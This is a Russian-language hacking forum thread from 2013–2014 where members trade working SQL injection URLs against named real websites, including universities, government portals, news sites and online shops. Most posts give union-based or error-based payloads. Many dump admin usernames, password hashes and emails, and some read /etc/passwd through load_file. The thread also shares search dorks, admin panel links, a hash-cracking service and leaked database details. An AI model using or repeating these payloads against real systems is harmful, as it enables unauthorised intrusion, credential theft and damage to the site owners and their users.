Просмотр полной версии : SQL Инъекции
WallHack
08.12.2013, 08:28
Система активной рекламы
Система активной рекламы
dork: intext:"POWERED BY SHOPFORBUX.RU"
PoC:
Code:
_http://kassirbux.ru/news.php?id=0%27+union+select+1,2,3,4+--+
Code:
_http://www.wm-explorer.ru/news.php?id=0%27+union+select+1,usename,3,4+FROM+t b_users+--+
Code:
_http://wm-cap.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+
Code:
_http://www.web-sprint.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+
Code:
_http://piar-bux.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+
Code:
_http://vicap.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+
Code:
_http://bux1.php-market.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+
Code:
_http://comfymoney.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+
Code:
http://www.capochino.it/article.php?id=-151+union+select+1,0x4861636b6564206279205365706f, 3,4,5,6,7,8,9,10--
Code:
http://www.aessweb.com/journal-detail.php?id=-5003+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18--
kingbeef
10.12.2013, 04:48
Тиц 1300
http://www.archipelag.ru/ru_mir/religio/gko/conception/journalism'+and(select+1+from(select+count(*),conc at((select+table_name+from+information_schema.tabl es+limit+0,1),floor(rand(0)*2))x+from+information_ schema.tables+group+by+x)a)--+g
Duplicate entry 'CHARACTER_SETS1' for key 1
Code:
http://www.romania.ici.ro/en/turism/pagina.php?id=-426+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),user(),database()),8,9,10,11,12,13--
Code:
http://apiexchange.com/index_main.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7--
Code:
http://www.snr.gov.ar/imprimir.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12--
Code:
http://www.mobil-com.cz/downloads_info.php?id=-79+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
WallHack
11.12.2013, 12:55
Code:
http://www.efbw.eu/news.php?ID=59+union+select+1,concat_ws(0x3a,versi on(),user(),database()),3,4,5+--+
comynicator
11.12.2013, 17:25
_ttp://www.futuresfins.com/fin-detail.php?id=-173+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8,9,10,11+--+
WallHack
11.12.2013, 17:44
Code:
http://www.northernoutpost.com/news.php?id=99+union+select+1,2,3,concat_ws(0x3a,v ersion(),user(),database()),5,6,7,8+--+
DezMond™
12.12.2013, 16:36
PR7
http://www.uni-erlangen.de/studium/studienangebot/uebersicht/studiengang-anzeige.php?id=-239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63+--+
Админку не нашёл(
Code:
http://www.injury-advocates.com/wp-content/plugins/formcraft/form.php?id=3+union+SELECT+1,2,3,concat_ws(0x3a,ve rsion(),user(),database()),5,6,7,8,9,10,11+--
Code:
http://www.moreanartscenter.org/news.php?id=-3119+union+select+1,0x4861636b6564206279205365706f ,concat_ws(0x3a,version(),user(),database()),4,5,6 ,7,8,9,10,11,12--
Code:
http://www.transitionceo.com/news.php?id=-41'+union+select+1,2,0x4861636b6564206279205365706 f,4,concat_ws(0x3a,version(),user(),database()),6, 7,8,9,10+--+
Code:
http://www.henleystandard.co.uk/news/news.php?id=-999+union+select+1,2,3,@@basedir,5,0x4861636b65642 06279205365706f,concat_ws(0x3a,version(),user(),da tabase()),8,9,10,11,12--
WallHack
13.12.2013, 08:35
Тиц 0 Пр 6
Code:
http://unilag.edu.ng/news.php?id=-32+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20+--+
Code:
http://eyesurgeryeducation.org/resources-news.php?id=-30+union+select+1,0x4861636b6564206279205365706f,3 ,4--
Code:
http://www.e-portal.com.ua/news.php?id=-11+union+select+1,0x4861636b6564206279205365706f,3 ,4,concat_ws(0x3a,version(),user(),database()),6,7 ,8,9,10,11,12,13--
Code:
http://www.stragtur.com/news.php?news=-28+union+select+1,0x4861636b6564206279205365706f,3 ,concat_ws(0x3a,version(),user(),database()),5,6,7--
WallHack
14.12.2013, 14:52
Code:
http://charliemars.com/news.php?id=-165+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6+--+
Улыбайся
14.12.2013, 21:27
++++
http://www.moto-hobby.ru/parts.php?id=-8780%27+union+select+1,2,3,4,@@version,6,7,8,9,10+ %20--+
http://loft8.ru/factories/?brand=-Il%20Loft%27+union+select+1,2,3,4,@@version,6,7,8, 9,10+--+
WallHack
15.12.2013, 07:24
Code:
http://www.bcnaerospace.org/public/new.php?id=-117'+union+select+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5,6,7+--+
Unknowhacker
15.12.2013, 15:33
Судовое Яхтенное Оборудование
Code:
http://www.zhigunov.com.ua/index.php?act=motor&sub_motor=-6+union+select+1,2,3,4,5,6,7,8,9,10,%28select%28@x %29from%28select%28@x:=0x00%29,%28select%28null%29 from%28zhigunov_zhigunov.adminarea%29where%280x00% 29in%28@x:=concat%28@x,0x3c62723e,login,0x3a,pass% 29%29%29%29x%29,12,13,14,15+--+
Админка (http://www.zhigunov.com.ua/admin/)
Note: Тут (https://crackstation.net/) расшифровываем хэш
WallHack
16.12.2013, 15:17
СОВЕТ европейским аэрокосмическим ОБЩЕСТВ
Code:
http://www.ceas.org/members.php?id=-8+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28+--+
Code:
http://sips.inesc-id.pt/people.php?id=-93+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5,0x4861636b6564206279205365706f,7 ,8,9,10--
ocheretko
17.12.2013, 06:41
Code:
http://jootem.me/wp-content/plugins/formcraft/form.php?id=53+UNION+SELECT+1,2,3,user_pass,5,6,7, 8,9,10,11+FROM+wp_users+WHERE+id=1
pr:7
http://
www.upt.ro
/en/pagina_princ.php?cat=nu_pagini+union+select+1,vers ion(),3,4,5,6,7,8,9+--+&id=ORnyx
см. исходный код (строка 1958)
================================================
http://
www.select-ing.es
/oferta.php?ID=676+and 1=2+union+select+version(),2,3,4,5,6,7,8,9,10,11,1 2+--+
================================================
http://
www.amigos.org.uk
/news-item.asp?id=72' and row(1,1)>(select count(*),concat((select password from adminusers),0x3a,floor(rand(0)*2))x from information_schema.tables group by x) and '1'='1
================================================
http://
www.sanctuarygreen.com.sg
/dev/label.php?id=14 || 1 group by concat((select version()),0x00,floor(rand(0)*2))having min(0)+--+
================================================
http://
www.girlsoftheserviceindustry.com
/girl.php?id=13+and+1=2+union+select+1,2,3,4,5,vers ion(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33+--+
================================================
http://cards.chelni.ru/search.php?event_id=-21'+union+select+concat_ws(':',user(),version())+--+
File_priv= Y
WallHack
18.12.2013, 14:32
Code:
http://www.intercoursevillage.com/members.php?ID=35'+union+select+1,concat_ws(0x3a,v ersion(),user(),database()),3,4,5,6,7,8,9,10+--+
pr:3
тиц:10
http://
www.vdv-tv.by
/index.php?razdel=11&video=417+and+1=2+union+select+1,2,3,4,concat_ws(0 x3a,login,email),6,7,8,9,10,11 from users+--+
administrator:asm@xaker.ru
=================================================
Code:
http://www.warrenhouse.com/event.php?id=-163+union+select+1,0x4861636b6564206279205365706f, 3,4,5,6,concat_ws(0x3a,version(),user(),database() ),8,9,10,11,12,13,14,15--
Code:
http://www.threedomsolutions.co.uk/news.php?id=-54+union+select+1,2,0x4861636b6564206279205365706f ,concat_ws(0x3a,version(),user(),database()),5,6,7--
Code:
http://www.redjuderias.org/red/boletin.php?lang=2&id=-76+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5--
строка 318 - 5.0.51a-24+lenny5:juderias@localhost:juderias
http://www.jump-shot.net/schedule.php?cat=-8+union+select+1,version(),3
5.1.66-0+squeeze1-log
WallHack
20.12.2013, 11:23
Code:
http://ggdgcolombia.co/entrevista-1.php?id=-1+UnIon+selECt+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23+--+
-----------------------------------------------------------------
Code:
http://www.maratonstav.cz/page.php?id=-143+union+select+1,2,concat_ws(0x3a,version(),user (),database())+--+
http://www.klf-75.ru/member.php?id=-30+union+select+1,2,version(),4,5,6,7,8,9,0,1
5.6.13
WallHack
21.12.2013, 09:21
Одна из наиболее успешных компаний на рынке Молдовы в области дистрибьюции алкоголя )
Code:
http://repost.md/theme/main.php?id=-13'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 16,16,17+--+&lang=1
Code:
http://www.galapagospark.org/boletin.php?noticia=-813+union+select+1,2,3,4,5,6,7,0x4861636b656420627 9205365706f,concat_ws(0x3a,version(),user(),databa se()),10,11,12,13,14,15--
Code:
http://www.sanchezdevanny.com/boletin.php?lang=en&id=-56+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,0x4861636b6564206279205365706f ,8,9--
Code:
http://www.wepler.com/actualite.php?id=-3+union+select+1,2,@@version,4--
WallHack
22.12.2013, 06:19
Система активной рекламы
Система активной рекламы Тиц 20 Пр 2
Всего пользователей 18436
Всего выплачено 53190.02 руб.
Code:
http://www.seopromox.net/forum_posts.php?th=0'+union+select+1,concat_ws(0x3 a,version(),user(),database()),3,4+--+
Email админа
Code:
http://www.seopromox.net/forum_posts.php?th=0'+union+select+1,email,3,4+FRO M+tb_users+--+
Пароль админа
Code:
http://www.seopromox.net/forum_posts.php?th=0'+union+select+1,password,3,4+ FROM+tb_users+--+
miel.ru
http://zd.miel.ru/exporter/sendmail.php?person=12442+union+select+concat_ws(' :',user(),version(),database())+--+
Code:
http://www.jetonfireplace.com/ProductInfo.php?id=-818+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19--
Code:
http://www.luckyinyourbox.com/productinfo.php?id=-333+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15--
Code:
http://linksfashionmall.net/productinfo.php?id=-449+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15
Code:
http://cgl-gabon.com/?p=ref&cat=2&scat=5&ref=-6+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10--
Code:
http://www.itshuetamo.edu.mx/indexSec.php?id=-8+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7--
Unknowhacker
25.12.2013, 18:12
Телефонные коды городов Украины
Code:
http://k-g-u.ru/moduls/kodgoroda.php?gorod=13921+and+1=0+union+select+1,2 ,3,4,%28select%28@x%29from%28select%28@x:=0x00%29, %28select%28null%29from%28kodcity_kod.admin%29wher e%280x00%29in%28@x:=concat%28@x,0x3c62723e,login,0 x3a,password%29%29%29%29x%29,6,7,8+--+
Note: Адмика (http://k-g-u.ru/cpanel) - profit!
/это не админка, это cpanel - Konqi
kingbeef
27.12.2013, 23:27
БИ-2 офф. сайт
http://bdva.ru/konserts.phtml?id=-80+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,user(),version()),12,13,14--+f
С Новым Годом, Друзья!
http://
www.avangard-salon.ru
/magaz/magaz.php?t=1&id=10'+and 1=2+union+select+1,2,concat(user,0x3a,pass),4,5,6 from userlist+--+
=================================================
http://
www.hailstudio.com
/client.php?id=79'+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15+--+
=================================================
pr:5
http://
www.southernhealth.ca
/service.php?id=6+and+1=2+union+select+1,version(), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24+--+
=================================================
http://
www.scientific-search.com
/es/oferta.php?id=0000000219'+and+1=2+union+select+1,2 ,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+--+
=================================================
http://
www.chriswins.com
/victory.php?id=51+and+1=2+union+select+1,version() ,3,4,5,6+--+
=================================================
http://
www.robertfritz.com
/index.php?content=about' or 1=1 and @a:=1 group by concat(version(),if(@a=0,@a:=1,@a:=0))having min(0)+--+
=================================================
http://
www.firmy.karlovarska.net
/firma.php?ID=5686'+and+1=2+union+select+1,2,3,4,5, 6,7,8,9,version(),11,12+--+
=================================================
http://
www.compassheights.com.sg
/dev/label.php?id=13+or+1+group+by+concat((select+versi on()),0x00,floor(rand(0)*2))having+min(0)+--+
=================================================
http://
www.atolbsl.co.uk
/service.php?id=5+or+1+group+by+concat((select+vers ion()),0x00,floor(rand(0)*2))having+min(0)+--+
=================================================
http://
www.gcbcalendar.com
/events/event.php?event_id=24718+and 1=2+union+select+1,2,3,4,5,6,7,(select(@x)from(sel ect(@x:=0x00),(select(0)from(gcbcalen_live.user)wh ere(0x00)in(@x:=concat(@x,0x3c62723e,login,0x3a,pa ssword,0x3a,email_address))))antichat),9,10,11,12, 13,14,15,16,17,18,19,20+--+
=================================================
http://
www.poiplie.sk
/clanok.php?chlan=eng&akcia=&id=6'+union+select+1,2,3,4,5,6,7,version(),9,10,11 +--+
=================================================
http://
www.galeriexxl.cz
/dila/rano.php?akce=koupit&id=-5143'union select 1,(select(@x)from(select (@x:=0x00),(select(0)from(wrs_galeriexxl_cz.users) where(0x00)in(@x:=concat(@x,0x3c62723e,username,0x 3a,pw,0x3a,users_admin))))x),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
=================================================
http://
www.wakyo.jp
/distribution/label.php?id=485+and+1=2++union+select+1,2,3,4,5,6 ,7,concat_ws(0x3a,user_login,user_pass),9 from wp_users+--+
=================================================
http://
www.campingiratxe.com
/en/offers/oferta.php?id=32'+union+select+1,version(),3,4+--+
=================================================
http://
www.klopina.cz
/kultura.php?id=80+union+select+1,version(),3,4,5+--+
=================================================
Улыбайся
31.12.2013, 19:14
----------------------
http://www.inion.ru/pers_about.html?id=-15+union+select+1,2,3,4,@@version,6,7,8,9,10,11+--+
Code:
http://www.kiamarina.com.au/showboat.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws (0x3a,version(),user(),database())--
DezMond™
05.01.2014, 15:20
PR7
http://www.leuphana.de/services/career-service/veranstaltungsprogramm/zurueckliegende-semester/archiv.html?s_titel=Wintersemester%202008/09&semester=ws0809+union+all+select+1,user(),3+--+
careerservice@www.leuphana.de
Code:
http://www.aupassportphoto.com.au/category.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9--
HellFire
06.01.2014, 21:39
RETROCUSTOMSHOP – Авто ретро-кастом движение в России.
Code:
http://retrocustomshop.com/?page=item&id=1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Data base(),0x2F2A2A2F,User())--
Database Version: 5.1.49-rel11.3-log
Database name: retrocustomshop
User name: 043143006_rcs@localhost
Вывод в коде.
ТИЦ: 0
PR: 1
Timon132009
08.01.2014, 03:52
Code:
http://www.iop.vast.ac.vn/ccp/member.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55
Code:
http://www.skiallday.co.uk/shop/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,version(),user(),database()),12,13,14,15,16
Code:
http://gdecarli.it/php/index.php?var1=1&var2=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database())
Code:
http://consult.nida.ac.th/en/project_detail.php?id=-123+union+select+1,2,3,4,5,@@basedir,7,concat_ws(0 x3a,version(),user(),database()),9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
kingbeef
13.01.2014, 03:17
Тиц 2600
Пр 6
http://belapan.com/archive/2013/06/24/632924/'or(ExtractValue(1,concat(0x3a,(select(table_name) from(information_schema.tables)limit/**/0,1))))='1
WallHack
13.01.2014, 18:55
Система Активной Реклам 10 тиц 1 пр
Code:
http://wrcbux.ru/forum_posts.php?th=0'+union+select+1,concat_ws(0x3 a,version(),user(),database()),3,4+--+
http://www.vampodarok.com/congrad.php?filterid=-140+union+select+1,@@version,3,4,5,6,7
http://f6.s.qip.ru/E2nOmT8j.jpg
http://www.skkdc.ru/index.php?mod=nov_pod&id=-77+union+select+1,user(),3,table_name,5,6,7+from+i nformation_schema.tables
kingbeef
17.01.2014, 23:20
Порнушка.
5xxx.ru 95к трафа в сутки
http://www.5xxx.ru/porno-foto/'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
pornosector.ru 30к трафа в сутки
http://pornosector.ru/incest-video.html'or(ExtractValue(1,concat(0x3a,(select(v ersion())))))='1
Code:
http://www.atlantic.edu/about/news/article.php?article=-1175+union+select+1,0x4861636b6564206279205365706f ,concat_ws(0x3a,version(),user(),database()),4,5,6 ,7,8,9,10,11,12--
Code:
http://www.metz-handball.com/jeune.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,0x4861636b6564206279205365706f,5--
WallHack
23.01.2014, 12:21
http://seo-clic.besaba.com/forum_posts.php?th=0%27+union+select+1,version(),3 ,4+--+
kingbeef
23.01.2014, 14:58
Lenta.ru
Тиц 23000
1кк трафа в сутки
http://strana.lenta.ru/latvia'or(ExtractValue(1,concat(0x3a,(select(load_ file(0x2F6574632F706173737764))))))='1
Code:
http://ua.nissan.ua/rus/media/show.php?a=cars&c_id=-1+union+select+1,2,3,concat(version(),0x3a,0x3a,us er())--
5.0.95-log::c13nissanua@localhost
danil7493
24.01.2014, 10:31
Code:
http://www.pfa.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.kubten.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.agppk.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://karasukpedcollege.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://aist.pedcollege.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://tm53.msk.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://gbou-bpt.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.volgmet.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.gouspt.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.detak.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://college31.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.kraspu19.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.ymk-salekhard.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.vozatt.ru/aist/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://vket29.ru/aist/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://rcstv.omgtu.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://mpk1.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://rcstv.omgtu.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.rgpk-revda.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.vil-kit.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://www.rub-rpc.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--
http://
www.juriedartservices.com
/index.php?content=event_info&event_id=754+and+1=2+union+select+1,2,
load_file(0x2f6574632f706173737764)
,4,5,6,7,8+--+
file_priv=Y
=================================================
nemaniak
29.01.2014, 16:42
socialblade.com Alexa-5k PR-5 >100к трафа
Code:
http://socialblade.com/digg/diggfpdata.php?id=20120329022427:465b6e9b-2d02-4f85-9395-abb5959da5cd%27%20UNION%20SELECT%201,2,3,4,5,6,7,c oncat_ws%280x3a,version%28%29,user%28%29,database% 28%29%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30%23
Code:
5.5.35-0ubuntu0.12.04.1:digg@localhost:digg
kingbeef
30.01.2014, 03:00
afisha.ru
Тиц 9400
http://internet.afisha.ru/katya-detkina'or(ExtractValue(1,concat(0x3a,(select(vers ion())))))='1
http://img844.imageshack.us/img844/8020/2k7k.png
Code:
http://www.infiniti-taganka.ru/company/news.php?id=-36%27+union+select+1,2,3,4,concat(version(),0x203c 666f6e7420636f6c6f723d7265643e3a3a3c2f666f6e743e20 ,user(),0x203c666f6e7420636f6c6f723d7265643e3a3a3c 2f666f6e743e20,database(),0x203c666f6e7420636f6c6f 723d7265643e3a3a3c2f666f6e743e20,0x203c623e3c666f6 e7420636f6c6f723d7265643e6e336d31733c2f666f6e743e3 c2f623e),6,7,8,9+--+
5.5.35-0ubuntu0.13.10.1 :: mikle@localhost :: autocenter
Code:
http://www.atlantic.edu/about/news/article.php?article=-1175+union+select+1,0x4861636b6564206279205365706f ,concat_ws(0x3a,version(),user(),database()),4,5,6 ,7,8,9,10,11,12--
http://www.spin-spb.ru/item.php?code=-1266+union+select+1,@@version,3,4,5,6,7,8,9,10,11--
5.5.35-0ubuntu0.12.04.2
Code:
http://ibaysilvershop.com/index.php?id=-7+union+select+1,@@basedir,concat_ws(0x3a,version( ),user(),database())--&content=HI
Code:
5.1.73-log:dbo295017473@74.208.16.253:db295017473
Code:
/USR/LOCAL/MYSQL-5.1.73-LINUX-I686-GLIBC23/
http://savepic.net/4464751.png
Code:
http://www.vsegda.tv/index.php?mod=genre&id=-15'+union+select+1,concat(version(),0x203a3a20,use r(),0x203a3a20,database(),0x203a3a20,0x6e336d3173) ,3,4+--+
5.1.70 :: vsegdatv_u5218@localhost :: vsegdatv_u5218
kingbeef
02.02.2014, 15:35
http://www.astbury.leeds.ac.uk/Report/download_report.php?id=94-9.999+union+select+1,2,3,4--
http://www.astbury.leeds.ac.uk/Report/download_report.php?id=94-9.999+union+select+1,2,3,version()--
Code:
http://ultimatehomedesign.com/news-detail.php?id=-312+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),user(),database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24--
Unknowhacker
05.02.2014, 16:40
Трубопроводная арматура +"фильтры тонкой очистки"
Code:
http://armaturka.com.ua/index.php?id=-87%27+/*!union*/+SeLect+1/*!,*/2/*!,*/3/*!,*/4/*!,*/5/*!,*/6/*!,*/version%28%29/*!,*/8/*!,*/9/*!,*/10+--+
Версия: 5.1.69-cll-lve
Code:
http://fodtennis.dk/news_view.php?id=-22+union+select+1,@@version,3,4,5--
5.1.61-0+squeeze1
Code:
http://bloodymilk.com/site/news_detail.php?id=-1+union+select+1,2,3,4,concat(user(),0x203a3a20,da tabase(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265 643e6e336d31733c2f666f6e743e),6--
bloodym_admin@localhost :: bloodym_site
Unknowhacker
06.02.2014, 18:07
Code:
http://www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28informatio n_schema.columns%29where%28table_schema!=0x696e666 f726d6174696f6e5f736368656d61%29and%280x00%29in%28 @x:=concat%28@x,0x3c62723e,table_schema,0x2e,table _name,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8 ,9,10,11+--+
pr: 6
тиц: 50
https://
www.flags.net
/country.php?country=SLVA'+and+1=(if(ascii(mid(vers ion(),1,1))=52,1 ,0))+--+
=================================================
Code:
http://www.melbournefineart.com.au/gallery.php?id=-18+union+select+1,version(),3,4,5--
4.1.21-log
www.softinfo.ca
http://
www.softinfo.ca
/en/produits.php?id=20+union+select+'
RUSSIA
'||'
SOCHI
'||'
2014
'+from+rdb$database+--+
=================================================
Code:
http://spa.sochi-zapolyarye.ru/index.php?menu=-16+union+select+concat(user(),0x203a3a20,database( ),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e3 36d31733c2f666f6e743e)--
hot_spazapolyary@localhost :: hot_spazapolyarye
Code:
